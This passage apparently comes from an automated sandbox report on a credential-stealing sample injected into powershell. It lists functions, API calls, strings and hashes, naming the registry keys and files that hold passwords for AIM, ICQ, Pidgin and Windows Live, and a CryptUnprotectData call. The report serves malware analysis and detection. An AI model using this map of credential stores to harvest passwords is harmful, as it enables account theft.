        • memset.MSVCRT ref: 0041385D
        • memset.MSVCRT ref: 00413871
        • memset.MSVCRT ref: 00413897
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
          • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
        • memcpy.MSVCRT ref: 004138CE
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
        • memcpy.MSVCRT ref: 0041390A
        • memcpy.MSVCRT ref: 0041391C
        • _mbscpy.MSVCRT ref: 004139F3
        • memcpy.MSVCRT ref: 00413A24
        • memcpy.MSVCRT ref: 00413A36
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpymemset$strlen$_mbscpy
        • String ID: salu
        • API String ID: 3691931180-4177317985
        • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
        • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
        • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
        • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
        Function 00403EDF Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
        • memset.MSVCRT ref: 00403F2E
        • memset.MSVCRT ref: 00403F42
        • memset.MSVCRT ref: 00403F56
        • sprintf.MSVCRT ref: 00403F77
        • _mbscpy.MSVCRT ref: 00403F93
        • sprintf.MSVCRT ref: 00403FCA
        • sprintf.MSVCRT ref: 00403FFB
        Strings
        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
        • <table dir="rtl"><tr><td>, xrefs: 00403F8D
        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
        • MessenPass, xrefs: 00403FE1
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memsetsprintf$FileWrite_mbscpystrlen
        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
        • API String ID: 113626815-2158351146
        • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
        • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
        • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
        • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
        Function 00403EF6 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
        • memset.MSVCRT ref: 00403F2E
        • memset.MSVCRT ref: 00403F42
        • memset.MSVCRT ref: 00403F56
        • sprintf.MSVCRT ref: 00403F77
        • _mbscpy.MSVCRT ref: 00403F93
        • sprintf.MSVCRT ref: 00403FCA
        • sprintf.MSVCRT ref: 00403FFB
        Strings
        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
        • <table dir="rtl"><tr><td>, xrefs: 00403F8D
        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
        • MessenPass, xrefs: 00403FE1
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memsetsprintf$FileWrite_mbscpystrlen
        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
        • API String ID: 113626815-2158351146
        • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
        • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
        • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
        • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
        Function 004062DB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 168stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
        • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
          • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
        • memset.MSVCRT ref: 00406349
        • memset.MSVCRT ref: 00406368
        • memset.MSVCRT ref: 0040637A
        • strcmp.MSVCRT ref: 004063B9
        • _mbscpy.MSVCRT ref: 0040644F
        • _mbscpy.MSVCRT ref: 0040646B
        • strcmp.MSVCRT ref: 004064B3
        • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
        • CloseHandle.KERNEL32(?), ref: 004064EE
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
        • String ID: ---
        • API String ID: 3240106862-2854292027
        • Opcode ID: 99f8cf32e1f3e44123f9acb0b31c0e69de81d1680ab2a584d9d4eb233c64d807
        • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
        • Opcode Fuzzy Hash: 99f8cf32e1f3e44123f9acb0b31c0e69de81d1680ab2a584d9d4eb233c64d807
        • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
        Function 0040E725 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142registrystringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 0040E768
        • memset.MSVCRT ref: 0040E77C
        • memset.MSVCRT ref: 0040E790
        • memset.MSVCRT ref: 0040E7A8
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • sprintf.MSVCRT ref: 0040E7D8
        • strlen.MSVCRT ref: 0040E806
        • _mbscpy.MSVCRT ref: 0040E888
        • _mbscpy.MSVCRT ref: 0040E89B
        • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
        Strings
        • %s\Login, xrefs: 0040E7D2
        • Password, xrefs: 0040E7DE
        • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
        • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
        • API String ID: 1782299107-1248239246
        • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
        • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
        • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
        • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
        Function 0040E8FD Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi
        • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
        • API String ID: 1439213657-1061492575
        • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
        • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
        • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
        • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
        Function 00408EAA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
        Download Yara Rule
        APIs
        • sprintf.MSVCRT ref: 00408ECB
        • LoadMenuA.USER32(?,?), ref: 00408ED9
          • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
          • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
          • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
          • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
        • DestroyMenu.USER32(00000000), ref: 00408EF7
        • sprintf.MSVCRT ref: 00408F3B
        • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
        • memset.MSVCRT ref: 00408F6C
        • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
        • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
        • DestroyWindow.USER32(00000000), ref: 00408FAC
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
        • String ID: caption$dialog_%d$menu_%d
        • API String ID: 3259144588-3822380221
        • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
        • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
        • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
        • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
        Function 00409068 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON
        Download Yara Rule
        APIs
        • _mbscpy.MSVCRT ref: 00409080
        • _mbscpy.MSVCRT ref: 00409090
          • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
          • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
          • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
        • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
        • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
        • _mbscpy.MSVCRT ref: 004090E3
        • memset.MSVCRT ref: 004090FF
        • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
          • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
        • String ID: TranslatorName$TranslatorURL$Version$general$strings
        • API String ID: 1035899707-2179912348
        • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
        • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
        • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
        • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
        Function 0041102B Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
        Download Yara Rule
        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
        • API String ID: 667068680-3953557276
        • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
        • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
        • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
        • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
        Function 004100A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 117registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
        • memset.MSVCRT ref: 004100EA
        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
        • LocalFree.KERNEL32(?), ref: 004101C5
        • RegCloseKey.ADVAPI32(?), ref: 004101D0
        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
        • RegCloseKey.ADVAPI32(?), ref: 004101F8
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
        • String ID: Creds$ps:password
        • API String ID: 551151806-1872227768
        • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
        • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
        • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
        • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
        Function 00405C4E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON
        Download Yara Rule
        APIs
        • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
        • MapDialogRect.USER32(?,?), ref: 00405C7D
        • memset.MSVCRT ref: 00405D4B
        • sprintf.MSVCRT ref: 00405D6E
        • SetWindowTextA.USER32(?,?), ref: 00405D83
        • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
        • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
        • String ID: %s:$SHAutoComplete$shlwapi.dll
        • API String ID: 2601263068-2802052640
        • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
        • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
        • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
        • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
        Function 004103F1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,75B4EC10,00000000,?,0040DCC1,?), ref: 0041041E
        • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,75B4EC10,00000000,?,0040DCC1,?), ref: 00410436
        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,75B4EC10,00000000,?,0040DCC1), ref: 0041045F
        • RegCloseKey.ADVAPI32(?,?,75B4EC10,00000000,?,0040DCC1), ref: 00410509
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • memcpy.MSVCRT ref: 004104C8
        • memcpy.MSVCRT ref: 004104DD
          • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
          • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
          • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
          • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
        • LocalFree.KERNEL32(0040DCC1,75B4EC10,?,?,?,75B4EC10,00000000), ref: 00410500
        • RegCloseKey.ADVAPI32(?,?,75B4EC10,00000000,?,0040DCC1,?), ref: 00410512
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
        • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
        • API String ID: 2768085393-888555734
        • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
        • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
        • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
        • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
        Function 00411BA1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63librarystringloaderCOMMON
        Download Yara Rule
        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
        • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
        • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
        • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
        • strlen.MSVCRT ref: 00411C15
        • strlen.MSVCRT ref: 00411C22
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressHandleModuleProcstrlen
        • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
        • API String ID: 1027343248-251837621
        • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
        • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
        • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
        • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
        Function 004121C1 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy
        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
        • API String ID: 714388716-318151290
        • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
        • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
        • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
        • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
        Function 0040E293 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 167fileCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
        • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
        • memset.MSVCRT ref: 0040E2F2
        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
        • memcpy.MSVCRT ref: 0040E3AC
        • memcpy.MSVCRT ref: 0040E3CB
        • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
        • CloseHandle.KERNEL32(?), ref: 0040E4A6
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
        • String ID: .aim.session.password$user_pref("
        • API String ID: 1009687194-2166142864
        • Opcode ID: 3301c009570dabdb8578617bf93d6c7150b1ff8625c9e7c5bf5b825b8a4131d0
        • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
        • Opcode Fuzzy Hash: 3301c009570dabdb8578617bf93d6c7150b1ff8625c9e7c5bf5b825b8a4131d0
        • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
        Function 0040D794 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
        • atoi.MSVCRT ref: 0040D840
        • memset.MSVCRT ref: 0040D869
        • _mbscpy.MSVCRT ref: 0040D8B3
        • _mbscpy.MSVCRT ref: 0040D8C6
        • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
        • memset.MSVCRT ref: 0040D7DC
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
        • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
        • API String ID: 2897902629-2277304809
        • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
        • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
        • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
        • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
        Function 00411172 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
        Download Yara Rule
        APIs
        • strchr.MSVCRT ref: 0041118A
        • _mbscpy.MSVCRT ref: 00411198
          • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
          • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
          • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
        • _mbscpy.MSVCRT ref: 004111E8
        • _mbscat.MSVCRT ref: 004111F3
        • memset.MSVCRT ref: 004111CF
          • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
          • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
        • memset.MSVCRT ref: 00411217
        • memcpy.MSVCRT ref: 00411232
        • _mbscat.MSVCRT ref: 0041123D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
        • String ID: \systemroot
        • API String ID: 912701516-1821301763
        • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
        • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
        • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
